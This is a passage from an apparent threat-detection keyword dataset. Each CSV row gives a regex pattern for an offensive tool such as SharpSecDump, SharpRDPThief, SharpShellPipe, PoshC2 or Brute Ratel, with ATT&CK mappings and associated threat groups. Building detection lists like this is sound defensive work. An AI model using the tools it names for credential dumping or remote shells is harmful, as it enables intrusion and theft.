T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59092" "*sharpps get-process*",".{0,1000}sharpps\sget\-process.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59093" "*sharppsexec*",".{0,1000}sharppsexec.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59094" "*SharpPsExecManager*",".{0,1000}SharpPsExecManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59095" "*SharpPsExecService.*",".{0,1000}SharpPsExecService\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59096" "*SharpRDP.*.dll.bin*",".{0,1000}SharpRDP\..{0,1000}\.dll\.bin.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59097" "*SharpRDP.csproj*",".{0,1000}SharpRDP\.csproj.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59098" "*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59099" "*SharpRDP.exe*",".{0,1000}SharpRDP\.exe.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59100" "*SharpRDP.sln*",".{0,1000}SharpRDP\.sln.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59101" "*SharpRDPHijack.cs*",".{0,1000}SharpRDPHijack\.cs.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","59102" 
"*SharpRDPHijack.exe*",".{0,1000}SharpRDPHijack\.exe.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","59103" "*SharpRDPHijack-master*",".{0,1000}SharpRDPHijack\-master.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","1","N/A","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","59104" "*SharpRDP-master*",".{0,1000}SharpRDP\-master.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","59105" "*SharpRDPThief is a C# implementation of RDPThief*",".{0,1000}SharpRDPThief\sis\sa\sC\#\simplementation\sof\sRDPThief.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","0","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","59106" "*SharpRDPThief.csproj*",".{0,1000}SharpRDPThief\.csproj.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - 
T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","59107" "*SharpRDPThief.exe*",".{0,1000}SharpRDPThief\.exe.{0,1000}","offensive_tool_keyword","SharpRDPThief","A C# implementation of RDPThief to steal credentials from RDP","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/passthehashbrowns/SharpRDPThief","1","1","N/A","N/A","10","2","160","28","2020-08-28T03:48:51Z","2020-08-26T22:27:36Z","59108" "*Sharpreflect *",".{0,1000}Sharpreflect\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59109" "*SharpReg.exe*",".{0,1000}SharpReg\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59110" "*SharpRoast.exe*",".{0,1000}SharpRoast\.exe.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation tool","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","N/A","10","1313","237","2024-10-24T21:58:54Z","2018-07-25T23:38:15Z","59111" "*SharpRoast.exe*",".{0,1000}SharpRoast\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","59112" "*SharpRODC.exe*",".{0,1000}SharpRODC\.exe.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","59113" 
"*SharpRODC.pdb*",".{0,1000}SharpRODC\.pdb.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","0","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","59114" "*SharpSAMDump.exe*",".{0,1000}SharpSAMDump\.exe.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","1","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","59115" "*sharpsc *cmd*",".{0,1000}sharpsc\s.{0,1000}cmd.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","59116" "*SharpSCCM*",".{0,1000}SharpSCCM.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59117" "*SharpSCCM.csproj*",".{0,1000}SharpSCCM\.csproj.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59118" "*SharpSCCM.exe*",".{0,1000}SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59119" "*SharpSCCM.exe*",".{0,1000}SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59120" "*SharpSCCM.Program*",".{0,1000}SharpSCCM\.Program.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59121" "*SharpSCCM_merged.exe*",".{0,1000}SharpSCCM_merged\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. 
formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","59122" "*SharpSCShell*",".{0,1000}SharpSCShell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","59123" "*SharpSearch.exe*",".{0,1000}SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59124" "*SharpSecDump Info*",".{0,1000}SharpSecDump\sInfo.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","0","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59125" "*SharpSecDump.csproj*",".{0,1000}SharpSecDump\.csproj.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59126" "*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59127" "*SharpSecDump.exe*",".{0,1000}SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59128" "*SharpSecDump.sln*",".{0,1000}SharpSecDump\.sln.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59129" "*SharpSecDump-master*",".{0,1000}SharpSecDump\-master.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","59130" "*sharpsecretsdump*",".{0,1000}sharpsecretsdump.{0,1000}","offensive_tool_keyword","CSExec","An alternative to 
*exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","59131" "*SharpShares.csproj*",".{0,1000}SharpShares\.csproj.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","59132" "*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59133" "*SharpShares.exe*",".{0,1000}SharpShares\.exe.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","59134" "*SharpShares.sln*",".{0,1000}SharpShares\.sln.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET 
Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","Black Basta - BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","59135" "*SharpShellPipe.exe*",".{0,1000}SharpShellPipe\.exe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","59136" "*SharpShellPipe.sln*",".{0,1000}SharpShellPipe\.sln.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","59137" "*SharpShellPipe-main*",".{0,1000}SharpShellPipe\-main.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","59138" "*SharpShooter.py*",".{0,1000}SharpShooter\.py.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","59139" "*SharpShot.exe /*",".{0,1000}SharpShot\.exe\s\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py 
from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","59140" "*Sharp-SMBExec.exe*",".{0,1000}Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT20 - APT29 - PowerPool","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59141" "*SharpSniper.exe*",".{0,1000}SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59142" "*SharpSocks.exe*",".{0,1000}SharpSocks\.exe.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59143" "*SharpSocks.pfx*",".{0,1000}SharpSocks\.pfx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59144" "*SharpSocks.resx*",".{0,1000}SharpSocks\.resx.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","59145" "*SharpSocks.sln*",".{0,1000}SharpSocks\.sln.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS 